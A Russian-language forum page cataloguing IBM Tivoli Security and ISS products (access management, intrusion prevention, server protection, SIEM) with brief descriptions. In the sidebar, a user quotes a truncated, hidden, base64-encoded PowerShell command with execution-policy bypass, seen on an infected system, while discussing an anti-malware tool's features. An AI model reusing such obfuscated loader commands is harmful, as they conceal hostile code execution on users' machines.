Перейти к содержанию
Кирилл Керценбаум

Продукты IBM Tivoli Security

Recommended Posts

Кирилл Керценбаум

В линейку продуктов IBM Tivoli Security входят различные продукты и сервисы, в разное время разработанные или приобретенные компанией IBM, в том числе продукты под маркой Internet Security Systems (ISS). Ниже приводится краткое описание и полезные ссылки на основные продукты:

ОБЩИЙ КАТАЛОГ ПРОДУКТОВ И УСЛУГ

Русская версия

Английская версия

1. УПРАВЛЕНИЕ ДОСТУПОМ

1.1. Tivoli Access Manager

1.1.1. Tivoli Access Manager for e-business - универсальное решение для устранения проблем аутентификации и проверки подлинности для классических и Веб приложений.

Кратко:

На русском

На английском

Подробно:

На английском:

Техническая документация

1.1.2. Tivoli Access Manager for Enterprise Single Sign-On - обеспечивает строгую аутентификацию, автоматизацию доступа и ведение отчетности о соответствии требованиям для всех приложений в пределах предприятия.

Кратко:

На русском

На английском

Подробно:

На английском:

Техническая документация

1.1.3. Tivoli Access Manager for Operating Systems - позволяет организовать аудит и более высокую безопасность для UNIX, Linux систем и систем виртуализации, при этом контролируя привелегии и полные права пользователей.

Кратко:

На английском

Подробно:

На английском:

Техническая документация

СРАВНЕНИЕ ВЕРСИЙ

1.2. Tivoli Security Policy Manager - усовершенствованный контроль доступа к ресурсам и приложениям, проверка соответствия требованиям и нормам, а также поддержка соответствия ИТ инфраструктуры

Кратко:

На английском

Подробно:

На английском:

Техническая документация

2. ПРЕДОТВРАЩЕНИЕ УГРОЗ

2.1. IBM Security Network Intrusion Prevention System

2.1.1. IBM Security Network Intrusion Prevention System Hardware Appliance - широкий спектр программно-аппаратных решений для защиты различных сетевых сегментов от широко спектра угроз и атак.

Кратко:

На русском

На английском

Подробно:

На русском:

На английском:

Техническая документация

СРАВНЕНИЕ МОДЕЛЕЙ

2.1.2. IBM Security Network Intrusion Prevention System Virtual Appliance - виртуальный программный комплекс для защиты различных сетевых сегментов от широко спектра угроз и атак.

Кратко:

На русском

На английском

Подробно:

На русском:

На английском:

Техническая документация

2.1.3. IBM Security Network Intrusion Prevention System for Crossbeam - программный комплекс для защиты различных сетевых сегментов от широко спектра угроз и атак для аппаратной платформы Crossbeam.

Кратко:

На русском

На английском

Подробно:

На русском:

На английском:

Техническая документация

2.2. IBM Security Server Protection - обеспечивает информационную защиту для серверов, работающих под управлением операционных систем Windows, Linux, Solaris, AIX и HP-UX на основе межсетевой экрана, системы предотвращения атак, защиты от «переполнения буфера» и системы контроля за активностью приложений.

Кратко:

На русском

На английском

Подробно:

На русском:

На английском:

Техническая документация

Техническая документация

2.3. IBM Security Virtual Server Protection for VMware - обеспечивает информационную защиту для серверов виртуализации VMWare и гостевых ОС на основе межсетевого экрана и системы IPS, технологии обнаружения Руткитов (Windows и Linux только), защиты VMotion, анализа трафика внутри виртуальных подсетей, автоматического устранения уязвимостей на уровне Гипервизора, контроля доступа пользователей и др.

Кратко:

На английском

Подробно:

На русском:

На английском:

Техническая документация

3. УПРАВЛЕНИЕ УЯЗВИМОСТЯМИ И СООТВЕТСТВИЕМ ТРЕБОВАНИЯМ

3.1. IBM Security Proventia Management SiteProtector System - обеспечивает централизованное управление устройствами безопасности для контроля политик, событий, анализа и отчетов для вашего бизнеса.

Кратко:

На русском

На английском

Подробно:

На русском:

На английском:

Техническая документация

3.2. IBM Security Tivoli Security Information and Event Manager - обеспечивает сбор и анализ логов с разнородных ИТ систем, а также мониторинг поведения и привилегий пользователей, аудит и контроль соответствия требованиям.

Кратко:

На английском

Подробно:

На английском:

Техническая документация

  • Upvote 25

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×